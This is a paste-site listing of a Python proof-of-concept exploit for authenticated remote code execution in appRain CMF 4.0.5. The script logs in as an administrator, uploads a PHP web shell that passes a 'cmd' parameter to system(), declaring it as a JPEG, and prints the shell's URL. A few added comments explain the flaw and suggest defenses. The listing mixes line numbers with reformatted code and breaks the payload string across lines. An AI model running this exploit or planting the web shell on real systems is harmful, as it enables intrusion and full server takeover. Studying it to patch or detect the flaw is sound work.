FlyFar

appRain CMF 4.0.5 - Remote Code Execution (RCE) (Authenticated)

Jun 8th, 2024
  1. # Exploit Title: appRain CMF 4.0.5 - Remote Code Execution (RCE) (Authenticated)
  2. # Date: 04/28/2024
  3. # Exploit Author: Ahmet Ümit BAYRAM
  4. # Vendor Homepage: https://www.apprain.org
  5. # Software Link: https://github.com/apprain/apprain/archive/refs/tags/v4.0.5.zip
  6. # Version: latest
  7. # Tested on: MacOS
  8.  
  9. import requests
  10. import sys
  11. import time
  12. import random
  13. import string
  14.  
def generate_filename():
    """Return five random lowercase ASCII letters followed by ``.inc``.

    The PoC uses the result as the name of the file it submits to the file
    manager, so every run produces a differently named ``.inc`` file.
    """
    stem_chars = random.choices(string.ascii_lowercase, k=5)
    stem = ''.join(stem_chars)
    return stem + ".inc"
  18.  
def login(site, username, password):
    """Authenticate against the appRain admin panel and return the session.

    Posts the admin id and password as a URL-encoded form to
    ``https://{site}/admin/system``. The login counts as successful when the
    response body contains the text "Logout"; otherwise the script exits.
    The upload step reuses the returned session, so the PoC depends on valid
    admin credentials.
    """
    print("Logging in...")
    time.sleep(2)
    session = requests.Session()
    credentials = {
        'data[Admin][admin_id]': username,
        'data[Admin][admin_password]': password,
    }
    form_headers = {'Content-Type': 'application/x-www-form-urlencoded'}
    response = session.post(
        f"https://{site}/admin/system",
        data=credentials,
        headers=form_headers,
    )
    # Guard clause: anything without the "Logout" marker is a failed login.
    if "Logout" not in response.text:
        print("Login Failed!")
        sys.exit()
    print("Login Successful!")
    return session
  38.  
  # upload_shell(session, site): submits one multipart upload to the file
  # manager using the authenticated session, then prints the URL where the
  # uploaded file is expected to be reachable. Exits the script on failure.
  #   session -- the object returned by login()
  #   site    -- host name used to build the https:// URLs
  39. def upload_shell(session, site):
  40. print("Shell preparing...")
  41. time.sleep(2)
  42. filename = generate_filename()
  43. upload_url = f"https://{site}/admin/filemanager/upload"
  # Uploaded part: field 'data[filemanager][image]', a name ending in ".inc"
  # (from generate_filename), a declared type of 'image/jpeg', and a body
  # that is an HTML form plus PHP which passes the 'cmd' query parameter to
  # system(). The mismatch between declared type and content is the point of
  # the PoC.
  # NOTE(review): the string literal is wrapped over five listing lines by
  # the paste site; as shown it is not a valid single-line Python string.
  44. files = {
  45. 'data[filemanager][image]': (filename, "<html><body><form method='GET'
  46. name='<?php echo basename($_SERVER['PHP_SELF']); ?>'><input type='TEXT'
  47. name='cmd' autofocus id='cmd' size='80'><input type='SUBMIT'
  48. value='Execute'></form><pre><?php if(isset($_GET['cmd'])){
  49. system($_GET['cmd']); } ?></pre></body></html>", 'image/jpeg')
  50. }
  51. data = {
  52. 'submit': 'Upload'
  53. }
  54. response = session.post(upload_url, files=files, data=data)
  # Success test: HTTP 200 and the text "uploaded successfully" in the body.
  # NOTE(review): the printed URL implies the file lands under
  # /uploads/filemanager/ and is executed as PHP when requested; neither the
  # server-side upload handler nor the web-server configuration is shown here.
  # Defensive reading: validate uploads server-side by extension allow-list
  # and content inspection rather than the client-declared type, store them
  # where scripts are not executed, and alert on non-image files appearing
  # under uploads/filemanager/ or on requests to that path carrying a 'cmd'
  # parameter.
  55. if response.status_code == 200 and "uploaded successfully" in response.text:
  56. print(f"Your Shell is Ready: https://{site}/uploads/filemanager/{filename}")
  57. else:
  58. print("Exploit Failed!")
  59. sys.exit()
  60.  
if __name__ == "__main__":
    # Command-line entry point: <site> <username> <password>.
    print("Exploiting...")
    time.sleep(2)
    # Exactly three positional arguments are required; otherwise print the
    # usage line and stop before any request is made.
    if len(sys.argv) != 4:
        print("Usage: python exploit.py sitename.com username password")
        sys.exit()
    site, username, password = sys.argv[1:4]
    # Both steps share one authenticated session: log in, then upload.
    session = login(site, username, password)
    upload_shell(session, site)
  72.            